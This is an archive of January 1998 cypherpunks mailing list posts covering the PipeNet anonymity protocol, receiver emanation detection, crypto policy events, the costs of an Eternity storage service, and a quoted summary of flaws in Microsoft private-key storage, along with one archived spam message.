If we told you we would have to kill you.

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 20 Jan 1998 16:00:12 +0800
To: cypherpunks@toad.com
Subject: PipeNet description
Message-ID: <19980119235325.54120@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



I just got a couple of requests for information about PipeNet and I
realized that I never did make my final description of it public. The
attached informal write-up was done shortly after Crypto '96 as a result
of discussions with Hal Finney, David Wagner, and Eric Hughes. I haven't
worked on it since then, mostly because the Onion Routing project is doing
similar work and appears to be much better funded (I did send them a copy
of this write-up per their request).

---

The Model
Consider a network of processors which send messages to each other
asynchronously.  We assume that each node is identified by its public key,
and that links between nodes are secure.  The adversary may control a
fixed subset of the nodes.  However all messages between any two honest
nodes are confidential and always arrive (unmodified) in the order sent
(this can be achieved with a standard transport level security protocol).

The Protocol
The protocol is based on the idea of virtual link encryption.
After an anonymous connection is established, the originating node sends a
constant stream of (constant size) packets to a second node at a fixed
rate. The second node shuffles the packets it receives during a time unit
and forwards them in random order to others.

A connection is a path in the network.  The first node in the path is the
caller, and the last node is the receiver.  The rest are called switches.
Anonymity in this scheme is asymmetric - the caller is anonymous, but not
the receiver.  Each node in the path shares a key with the caller and
knows the nodes immediately in front of and behind it.  Every pair of
adjacent nodes shares a link id.

Each switch in the path therefore has a key and two associated ids.  Call
the id that it shares with the previous node (the one closer to the
caller) type A, and call the other id type B.  For each id, the switch
expects exactly one packet tagged with that id in each time unit.  When it
receives a packet tagged with a type A id, it decrypts that packet with
the associated key, tags it with the corresponding type B id, and forwards
it to the next node.  When it receives a packet tagged with a type B id,
it encrypts the packet with the associated key, tags it with the
corresponding type A id, and forwards it to the previous node.  The
forwarding is always done at the end of the time unit, and the order in
which packets are sent is random.

For each packet going from the caller to the receiver, the caller must
multi-encrypt it with the keys it shares with each of the nodes in the
path, starting with the receiver.  It then sends the packet to the first
switch tagged with the appropriate link id.  Each switch will strip a
layer of encryption and forward the packet to the next node.  For a packet
going from the receiver to the caller, the receiver encrypts it with the
key it shares with the caller and sends it to the last switch in the path.
Each switch will add a layer of encryption and forward the packet to the
previous node.

To establish a connection, the caller (N0) performs the following steps:
1.  Select a node (N1) at random and establish a key (K1) and link id (S1)
with N1.
2.  Select another node (N2) at random.
3.  Request that N1 establish a link id (S2) with N2.
4.  Establish a key (K2) with N2 through N1.
5.  Request that N1 use K1 to decrypt all messages tagged with S1, tag the
decrypted message with S2 and forward them to N2.  Also request that N1
use K1 to encrypt all messages tagged with S2, tag the encrypted messages
with S1 and forward them to N0.
6.  Repeat steps 2 to 4 l-2 times.  (Name the i-th node, key, and id Ni,
Ki, and Si respectively.)
7.  Repeat steps 2 to 4 a final time, but with the receiver node (Nl)
instead of a random node.

Timing
We assumed earlier that communications links between honest nodes are
vulnerable to delay attacks.  Therefore we must ensure that link delays do
not reveal traffic information.  Each node expects one packet from each
link id in each time unit.  Extra packets are queued for processing in
later time units.  However, if it does not receive a packet for a link id
in a particular time unit, it stops normal processing of packets for that
time unit and queues all packets.  This ensures that any delay is
propagated through the entire network and cannot be used to trace a
particular connection.

The process of making and breaking connections must also not leak
information.  This can be done by using a protocol analogous to mix-net.
Link forming/destroying requests are queued and performed in batches in a
way similar to queuing and mixing of e-mail in a mix-net.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 20 Jan 1998 13:37:08 +0800
To: cypherpunks@toad.com
Subject: Re: OpenPGP WG meeting minutes
In-Reply-To: <9801200250.AA18842@h2np.suginami.tokyo.jp>
Message-ID: <NLaLJe4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Hironobu Suzuki <hironobu@h2np.suginami.tokyo.jp> writes:

>
> > Miscellaneous: (Comments not recorded)
> ...
> >		We should not just put in everyone's pet algorithms.
>
> I agree.
>
> But I want new algorithm id for MISTY1 when this document become
> RFCXXXX. MISTY1 which was designed by Matsui-san looks so good.  I
> believe an algorithm which is described in RFC is not a `pet' one.
>
>
> ----MISTY1 INTERNET DRAFT----
> INTERNET-DRAFT                                                   H. Ohta
> Expires in six months                                          M. Matsui
>                                          Mitsubishi Electric Corporation
>                                                            December 1997
>
>
>             A Description of the MISTY1 Encryption Algorithm
>
>                      <draft-ohta-misty1desc-00.txt>
>
>
> ---
> Hironobu SUZUKI        Independent Software Consultant
> E-Mail: hironobu@h2np.suginami.tokyo.jp
> URL://www.pp.iij4u.or.jp/~h2np

To learn some English, chop-chop.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 20 Jan 1998 13:27:20 +0800
To: cypherpunks@toad.com
Subject: Re: proving that one knows how to break RSA
In-Reply-To: <199801190915.KAA15874@basement.replay.com>
Message-ID: <H2aLJe12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous <nobody@REPLAY.COM> writes:
> Payne is obviously a nut case

You have a problem with that?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Tue, 20 Jan 1998 14:38:58 +0800
To: csee <csee@cs.umbc.edu>
Subject: $50 encryption policy contest
Message-ID: <Pine.SOL.3.95.980120003716.18100B-100000@topdog.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain



                   $50 www Contest

I will pay $50 to the best www page created by 12noon EST, February
15, 1998, meeting the enclosed specifications.  In short, the page
must have a form through which anyone may enter a question, which will
be automatically entered onto a list of submitted questions displayed
on another page.  I will use the winning entry to collect questions
for the upcoming March 6 talk on encryption policy by Barry Smith
(FBI).

How to enter:
email a url of your entry to sherman@cs.umbc.edu
include the phrase "Barry Smith Contest Entry" in the subject header.
All URL's for all entries will be listed from
http://www.cs.umbc.edu/events/spring98/crypto2.shtml

Rules:
1. The page must work from the CMSC computing environment, but
     initial judging will take place on the designer's server.
2. Anyone in the world may enter.
3. If no one submits an adequate entry by February 15, 
      a $20 prize will be awarded
      to the best entry that meets a restricted set of specifications.
      In this case, the contest will be extended for one more week,
      with a reduced prize of $30 for the best full entry received
      by 12noon EST, February 22, 1998.
4. Entries will be judged on the basis of satisfying the specifications,
   robustness, creativity, ease of use, and visual appeal.
5. Group work is allowed and encouraged.
6. I will be the sole final judge of the winner.

Specifications:

A. $20 Restricted Specifications

 1. The form must include entries for a restricted-length
    question (at most 500 ascii characters), an email address,
    and optionally a name.

 2. The form must include a submit button, which when clicked,
    will automatically append the question to a list of questions 
    on a separate www page.  Each displayed question must include
    the author's email and name (if provided).

B. $50 Full Specifications

In addition to the $20 specifications, the forum must also
meet the following sp[ecifications:

 3. (**important**) The page of submitted questions must have a means
    by which anyone can score the quality of the question on a scale
    of 1 to 5 (say, by clicking on the appropriate score button), with
    5 being the highest score.  For each question, its median score
    must be displayed.  Questions must be listed in order of
    decreasing median scores.  

 4. The form must have an entry for optional URLs.  These URLs must
    be posted with the question in such a way that they are active.

 5. There must be an entry for sender status (selection from
    a list of options, such as cypherpunk, NSA employee, 
    UMBC student, other student, government employee, faculty,
    industrial engineer, ...)

 6. (optional) For each question, also list the number of votes entered
    for each score in addition to the median score.

 7. (optional) Reject any question containing a vulgar word.

 8. (optional) Feel free to add other appropriate constructive
    functionality.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Tue, 20 Jan 1998 14:58:51 +0800
To: Eric Blossom <eb@comsec.com>
Subject: Re: Locating radio receivers
In-Reply-To: <E0xtbs7-0004Rk-00@heaton.cl.cam.ac.uk>
Message-ID: <19980120015007.64178@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Jan 19, 1998 at 01:55:55PM -0800, Eric Blossom wrote:
> > Kay Ping wrote on 1998-01-16 22:02 UTC:
> > > Radio links are perfect for hiding the location of receivers.
> > 
> > Actually, this is only true for extremely carefully shielded military
> > receivers and not for normal radios. Every receiver contains a local
> > oscillator to bring the signal down to intermediate frequency (IF), which
> > is emitting EM waves itself. In addition, the IF signal is emitted
> > as well.
> > 
> > As Peter Wright reported in his autobiography, British counterintelligence
> > (MI5) used vans and planes already in the 1950s to detect spys while
> > they received radio communication messages from Moscow and to protocol,
> > which frequency bands the embassies were monitoring (operation RAFTER).
> > Efficient receiver detection is an active process: You send out short
> > bursts of a wideband jamming signal and try to find the downtransformed
> > intermediate frequency equivalent of your burst in the compromising
> > emanations of the receiver. This way, you get not only the location of
> > the receiver, but also the precise frequency to which it is tuned.
> > 
> > Locating radio receivers within a radius of many hundred meters this way
> > was already state of the art in the spook community over 40 years ago,
> > so you can safely assume that with digital signal processing, the
> > performance parameters of modern systems have been increased
> > significantly. Sending out spread-spectrum style pseudo-noise signals
> > in the active probing bursts could give you in modern receiver detectors
> > a considerable signal gain.
> > 
> > Markus
> 
> Hi,
> 
> I talked to some RF guys about the RAFTER attack about a year ago.
> Their opinion was that since modern receivers have GaAs FET mixers,
> they don't leak the LO or IF out the antenna like the old fashioned
> inductor based mixers did.
> 
> This should be trivial to confirm with a spectrum analyzer.
> 
> Eric

	This varies a great deal.  Generally cheap vhf/uhf scanners and
the like radiate quite a bit of energy and can be easily seen on a
spectrum analyzer at hundreds of feet (with no special effort).   A good
bit of energy escapes many scanners through the cheap and poorly
shielded plastic case and power cords rather than leaving via the
antenna, so even if a good broadband preamp is used between the antenna
and the input of the scanner - which should effectively eliminate LO
radiation from going out the antenna because the preamp is going to have
to have a great deal of loss for energy routed through it backwards
(output to input) or it would be unstable and oscillate -  the signals
radiated from the radio itself and the power cord will give it away.

	First local oscillator energy is the most easily seen radiation
from scanners - IF radiation is much lower in level in most modern 
gear because of the very short lead lengths and comparitively low signal
levels and good decoupling from the antenna - IF frequencies (save the
first IF on many scanners) are low enough so the component leads don't
act like a very good antenna because they are such a tiny fraction of
a wavelength.

	High grade military/spook class receivers are much better
shielded, some in fact to TEMPEST level specs,  and don't have the
problems that most  cheap scanners for hobbiests have.  If used with a
good preamp ahead of them they are very hard to detect if the shielding
is intact and undamaged (which may or may not be the case for a unit
that has been kicked around for years and carelessly repaired and
modified).

	But a fair number of modern HF (2-30 mhz)  communications
receivers and transcievers use no or very little RF amplification before
the first mixer in order to maximize dynamic range and third order
intercept and their 1st LO's (usually in the low VHF range) are not as
well isolated from the antenna.

	However, most modern receivers use synthesized local oscillators
phase locked to a local crystal oscillator and the LO is not as likely
to be detectably modulated by the audio the receiver is receiving as was
the case with the vacuum tube era communications receivers in the RAFTER
era that used free running LC tuned oscillators.   Power supply regulation
and decoupling is much better in modern gear, and this combined with
the use of phase locked synthesized oscillators means that while it may
be possible to detect radiation from the receiver LO, it is not as easy
to detect fm and am sidebands coming from the receiver audio which was
the basis of a lot of RAFTER work.

	But sensitive spectrum analyzers are available and not uncommon
these days, so anyone who is trying to operate an undetected receiver
for any serious purpose now has the tools to determine just how much his
gear is radiating.   Of course the detection gear has gotten better too,
but careful shielding up to and including faraday cages, use of good
preamps and circulators and use of spectrum analyzers to check for stray
radiation makes it less likely that someone will  easily find a
carefully hidden receiver than in the past.   But a plastic cased
consumer grade scanner from Radio Shack may be detectable a half mile
away... or more...



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 20 Jan 1998 16:12:30 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: British Ministers Adopt Unbreakable Crypto
In-Reply-To: <199801192330.RAA09810@wire.insync.net>
Message-ID: <199801200825.DAA06075@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801192330.RAA09810@wire.insync.net>, on 01/19/98 
   at 06:30 PM, Eric Cordian <emc@wire.insync.net> said:

>Anyone know what they actually use to sector encrypt the file system on
>these things?  It would be somewhat amusing if it were snake oil
>based.

It may not be snake-oil but you can bet it will be GAKed. I can just
imagine some poor clerk tying to explain to one of those boneheads that
they can't get their files just because they forgot their passphrases. I
wouldn't be suprised if there were several keys floating around that would
give access to one of those machines.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: You said Windows was a Power Tool???

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMRN4I9Co1n+aLhhAQFRdwP8Dhr511XyhabfAHN8Vr5xFB9l/cGqCV50
opc7y+BIYmVnbxExha+TFUcmbC285kAqxASaR8klTqAdeYJuoBy3/4GK6jbsnlBo
KumzbyaM7hTcLIP8dfRM8Rs2Ol0NcBv0Qn+JmxkkAyn0F9FzOIdNfEwkJXVjU3WW
Q0abx0ieCYg=
=aLAL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: garte6493@compuserve.com
Date: Tue, 20 Jan 1998 04:02:35 +0800
To: <cypherpunks@toad.com>
Subject: This is so Incredible!
Message-ID: <20992090_14372405>
MIME-Version: 1.0
Content-Type: text/plain




Work SMART......not hard!

You can easily make hundreds a week just passing out this 800 number with your code 
number.   Many  are  making thousands a week.  This is positively the easiest money
 that I have ever made!

The company does the selling for you,  closes the deal,  and sends you $100 for every 
sale PLUS monthly residual income. 

  I have done a lot of programs but believe me,  NOTHING comes close to this!

Don't miss this opportunity! Call now!

1-800-811-2141   Code #44737 .   8 - 10  Mon-Sat  (CST)  (This is HOT!  If it is busy, keep trying).

In Canada call 1-800-588-9786  Code #44737

Shirley
maceywW@hotmail.com


 The NUMBER #1 homebased business for 2 years in a row!


************************************************************************
To be removed from this list,  please send remove requests to remove@remove.org.
************************************************************************

***************************************************************************
No Reply.  Because of illegal acts by internet terrorists upon bulk friendly ISPs (mail bombs, hackers, ping attacks, etc) we regret that we cannot supply a valid reply address.
***************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 20 Jan 1998 11:57:18 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: British Ministers Adopt Unbreakable Crypto
In-Reply-To: <199801192330.RAA09810@wire.insync.net>
Message-ID: <Pine.BSF.3.96.980120043931.10472B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 19 Jan 1998, Eric Cordian wrote:

> Bruce Schneier writes:
> 
> > >``There is even a duress finger,'' Rushworth said. ``That is for if a
> > >terrorist or gunman has a gun to the minister's head forcing him to
> > >open the computer. It will appear to function normally but doesn't,
> > >and sends a silent alarm to the Cabinet Office.''
> 
> > This is INSANE.  How could someone be so stupid as to announce
> > such a feature in a newspaper.  I guess this means that if a
> > terrorist sees a Cabinet minister with such a computer, he had
> > better shoot to kill.
> 
> > The whole point of a feature like this is that its existence is secret.
> > Someone is NOT paying attention.
> 
> I don't think the machine is going to do any silent alarming in the
> grounded Faraday cage with the 10 severed fingers lying on a plate next to
> it.

This reminds me of a conversation I had at a recent biometrics exhibition.
One company exhibited hand shape scanners, such as those installed at San
Francisco International Airport to control access to "sensitive" parts of
the airport. [Do not pass security, go straight the "clean" area].

I asked the exhibitor if the scanner would grant access to a hand not
attached to the body. At first, the exhibitor paled and replied that if a
severed hand was part of my thread model (not using these terms), then my
"facility had larger problems than could be solved by access control". The
booth staff, visibly shaken by my insinuation that there are people that
might severe somebody's had to gain access to an environment, kept
following me with their eyes as I walked away from the exhibit.

Seems these amateurs hadn't considered that somebody getting ready to blow
up an airplane with 250 passengers on board just might have relatively few
qualms about detaching the hand of one Filipino airport janitor on his way
to work.

To their credit, the EyeDentify booth staff (the world's sole manufacturer
of retinal scanners), knew what they were doing. Their system checks for
blood flow, etc. A removed eye or a cadaver won't do. Now there is a
company that understands security.

[Disclaimer: I have no connection whatsoever to either manufacturer].

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Tue, 20 Jan 1998 21:15:43 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: $50 encryption policy contest
In-Reply-To: <Pine.BSF.3.96.980120083403.10779A-100000@pakastelohi.cypherpunks.to>
Message-ID: <Pine.SOL.3.95.980120075545.18824D-100000@topdog.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 20 Jan 1998, Lucky Green wrote:

> Given that the majority of the serious people on the list charge upwards
> of $100/hour (I charge $250/hour for even looking at a problem), $50 seems
> to be insufficient to generate much interest.

Your point is well taken.  I should have explained that I am
seeking assistance for altruism from someone who is interested
in crypto policy.  For example, no one is compensating me for
the many hours I've volunteered to pull off this two-part
lecture series (and it was quite a challenge to get anyone
with government connections to go on stage with John Gilmore).  See 
   http://www.cs.umbc.edu/events/fall97/crypto.shtml

I'm also trying to help students by suggesting a concrete, worthwhile,
interesting project through which to learn about www programming.

I am open to the idea of a prize fund:  I will augment the
prize with 100% of all prize donations mailed to me.  If
each of 200 people send me $1, the prize fund will grow to $250.
(make out check to "UMBC")

Dr. Alan T. Sherman
Dept. of CSEE
UMBC
1000 Hilltop Circle
Baltimore, MD 21250





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 20 Jan 1998 22:30:31 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: FDA bans human cloning [CNN]
Message-ID: <199801201457.IAA26472@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                  FDA: NO HUMAN CLONING WITHOUT AGENCY APPROVAL
>                                        
>      Cloning graphic January 19, 1998
>      Web posted at: 9:18 p.m. EST (0218 GMT)
>      
>      WASHINGTON (AP) -- The Food and Drug Administration has a warning
>      for the Chicago physicist who wants to clone a human: The agency
>      will shut down anyone who tries without its permission.
>      
>      Richard Seed's cloning plans have sparked a public outcry and a race
>      by Congress and more than a dozen states to ban cloning. With the
>      FDA filling what critics had called a regulatory vacuum, scientists
>      say lawmakers should take more time to ensure vaguely worded
>      anti-cloning bills don't also ban lifesaving medical research.
>      
>      "It's been a public and media assumption that there is nothing on
>      the books that would even slow or stop Dr. Seed," said Carl Feldbaum
>      of the Biotechnology Industry Organization, which represents
>      biotechnologists involved in cloning research. FDA intervention
>      "creates at least some breathing space."
>      
>      FDA investigators plan to make clear to Seed that federal
>      regulations require that he file for FDA approval to attempt cloning
>      -- permission highly unlikely.
>      
>      "We're not only able to move, we're prepared to move," said Dr.
>      Michael Friedman, FDA's acting commissioner, noting the agency can
>      go to court to stop unauthorized cloning attempts.
>      

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 20 Jan 1998 22:31:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Intel introduces new compression technology for surfers [CNN]
Message-ID: <199801201459.IAA26531@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    
>               INTEL INTRODUCES TECHNOLOGY TO SURF THE WEB FASTER
>                                        
>      January 19, 1998
>      Web posted at: 9:35 p.m. EST (0235 GMT)
>      
>      HILLSBORO, Oregon (AP) -- The World Wide Wait may be over.
>      
>      Computer chip giant Intel on Monday announced a way for Internet
>      surfers to download images twice as fast over regular phone lines
>      without any special equipment or software -- but it will add about
>      $5 to monthly access fees.
>      
>      The technology called Quick Web is installed on the computers called
>      servers that Internet services use to store and relay data. The
>      combination of Intel hardware and special software compresses all
>      the graphic images that are piped through the server, boosting
>      access speed.
>      
>      "The more pictures on the screen, the faster it is," said Dave
>      Preston, Internet marketing manager for Intel.
>      

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 20 Jan 1998 22:58:51 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
Message-ID: <199801201526.JAA26626@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 18 Jan 1998 22:00:24 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: (eternity) Eternity as a secure filesystem/backup medium
>   (fwd)

> Assume the existence of a for-profit service provider.
> The service provider needs to cover the costs of the service,

Which in general are a flat rate. I'll try to fill in the various issues you
raise with as real-world numbers as I can get.

> plus enough profit to make the effort interesting.
> The prices charged need to reflect the costs (or be higher)
> or the service provider can't make money and goes out of business.
> So what are the costs, and who can be talked into paying for them?

Everyone who uses the system. The question is who do we want to define as
'using'. I believe the provider of information is not 'using' the system
in the strictest sense but rather making an investment of their time and
effort in somebodies elses business model and hoping that work will bring
them profit.

> 1) Storage of information - Storage currently costs < $1/MB for raw disk, 
> and getting cheaper by the minute,

Assuming your 5 year plan, a 1G drive costs $100 or less. That's roughly
$20/G-yr.

> but sysadmins, lawyers, etc.
> cost money and they're not getting cheaper as fast.

Granted, but except for the sys-admin you don't need them often. In all the
years I have been in business I've needed a lawyer only a couple of times.
Say $1k/lawyer-year.

> The costs of the equipment for permanent storage are probably about
> 10-50% more than the costs for storing for 5 years;

A Cyrix P200 runs about $600 for a working box (I bought one just a few
weeks ago). So that gives us about $120/cpu-year.

> the costs of administration (assuming inflation is limited to
> some small number) can be covered by an annuity.

For reliable system administartion you're looking at 5 people (3 8-hr.
shifts plus weekend coverage of 2 12 hour shifts). A sys admin with the
skills and maturity to work in this environment is going to run you in
the neighborhood of $40-60k/yr. So this means we're looking at, on the
outside, $300k/sysadmin-yr. This is the real cost of doing business.

> Every technology upgrade or two you need to copy the archives to 
> new storage media, and data that doesn't get accessed often may
> get migrated out to slower or perhaps even offline media;
> storage contracts need to reflect that retrieving data that hasn't
> been accessed in a while may involve some delay.

Not shure what the normal ratio for online versus offline storage actualy
is currently, say 10:1.

> 2) Transmission of information - Roughly proportional to MB/time -

This seems overly simplistic to me. The actual cost of the bandwidth is
reasonably fixed for a given site. Also if we throw in the other servers
this model becomes a bit more flexible. Remember, under the Eternity model
we don't know *which* server is being hit for the request. This means we
have to consider the actual end user costs in a much more complicated
fashion. It's one of the issue I'm working on myself. It does not seem clear
cut nor well researched at all.

> unlike storage, this one's not predictable, unless the provider and
> author agree in advance (e.g. N free accesses per year, per password.)
> So the provider could charge the reader for access,

I fail to see the profit in giving away plans for man portable nukes or to
turn commen cooking yeast into a THC producing horde when the various
groups around the world would pay so many millions (or would that be
billions) for some to get it and some to keep others from getting it. The
potential for a access auction hasn't been explored as far as I am aware.

> or use advertising
> banners to fund retrieval costs (if that remains a valid model
> for financing the web over the next N years, especially if the
> readers retrieve data through anonymizers.)

I believe advertising would be a necessity. The question is how. Would the
payoff for doing a print ad in a magazine be worth it? Should it only
be advertised on the net?

> 3) Legal defense - This one's harder to predict :-)  

If the Eternity model works the question becomes which one and where are
they located? Whose legal defense? Which jurisdiction? Put up an offer for 1
weeks notice of any pending legal actions against the network and make it
worth the while. Say $500M. It would of course be fully anonymous and the
information would have to be testable prior to payout. Leaves two option.
First, the data is verified and the source is paid. Second, the server
goes down and the source isn't paid - thus ruining the reputation of a
server. It isn't clear to me what the total impact would be on the network
as a whole. One way to mediate this impact on a given server would be to
share the cost of the payout between the various servers. It is after all in
all the servers best interest to keep as many going unharrassed and as well
prepared and for-warned as possible.

> The current US climate is that service providers are relatively immune 
> as long as they cooperate with subpoenas and court orders,

True, but the current model doesn't allow anonymous providers as the norm
either. The users may be anonymous but the ISP isn't.

> If they want their names known, they can include them in the contents
> of the data that readers retrieve, independent of what the server does.

Then there is no reason to use an anonymous network, simply put the data on
their own webpage and sell it direct, cut out the middle-man a tried and
true business tactic.

> and accumulate reputation capital under those nyms.

One of the assumptions is that the source, individual server, and sink
are all anonymous to each other as well as Mallet. Now we're changing the
rules of the game in the middle of the game. Apples and oranges.

If I were actualy going to impliment something like this I wouldn't even
consider it unless I had at least $500k worth of funding for each of the
first 5 years. That start up cost, $2.5M, is what is going to kill it.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 21 Jan 1998 02:30:35 +0800
To: cypherpunks@toad.com
Subject: Taxonomy of crypto applications
Message-ID: <3.0.5.32.19980120101359.007c6c10@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain





Trying to make sense of the various applications of crypto,
I came up with an illustration of their 'dependancies' at
	http://rattler.otc.net/crypto/mydocs/taxonomy.gif
This picture illustrates topics that you should learn
before others.

For instance, digital watermarking depends on steganography
and message-authentication codes.  Anonymity requires
understanding traffic mixing and practical encryption; practical
encryption requires understanding public and secret key encryption.

FWIW.  Comments welcome.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	     Directorate of Intelligence, CIA
	     http://www.jya.com/cia-notes.htm
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 21 Jan 1998 01:23:16 +0800
To: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Subject: Re: [Long] How to recover private keys for various Microsoft products
In-Reply-To: <88531016604880@cs26.cs.auckland.ac.nz>
Message-ID: <199801201732.MAA10200@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <88531016604880@cs26.cs.auckland.ac.nz>, on 01/21/98 
   at 04:29 AM, pgut001@cs.auckland.ac.nz (Peter Gutmann) said:

>Summary
>-------
> 
>Microsoft uses two different file formats to protect users private keys,
>the original (unnamed) format which was used in older versions of MSIE,
>IIS, and other software and which is still supported for
>backwards-compatibility reasons in newer versions, and the newer PFX/PKCS
>#12 format.  Due to a number of design and implementation flaws in
>Microsofts software, it is possible to break the security of both of
>these formats and recover users private keys, often in a matter of
>seconds.  In addition, a major security hole in Microsofts CryptoAPI
>means that many keys can be recovered without even needing to break the
>encryption.  These attacks do not rely for their success on the presence
>of weak, US-exportable encryption, they also affect US versions.

This is a battle I have been fighting for years now. Do not TRUST
Mircosoft for security. Plane and simple. They have shown for years now
that they are incapable or unwilling to spend the time, money, and effort
to produce secure products (Remember the MS claims of NT being C2 rated?
LOL!!!).

I have spent quite a bit of effort trying to educate ISV's not to use the
MS crypto API for a variety of reasons. Unfortunately, for the most part
it falls on deaf ears. Most ISV's are unwilling to accept the fact that
security as an afterthought does not work. Combine this a public that does
not care about security but is willing to accept the warm fuzzies from
pseudo-security and you get bug filled crap like the MS CryptoAPI accepted
throughout the market place.

I have come to the point now that I will not use any commercial security
software nor will I recommend it to any of my clients. If it is not
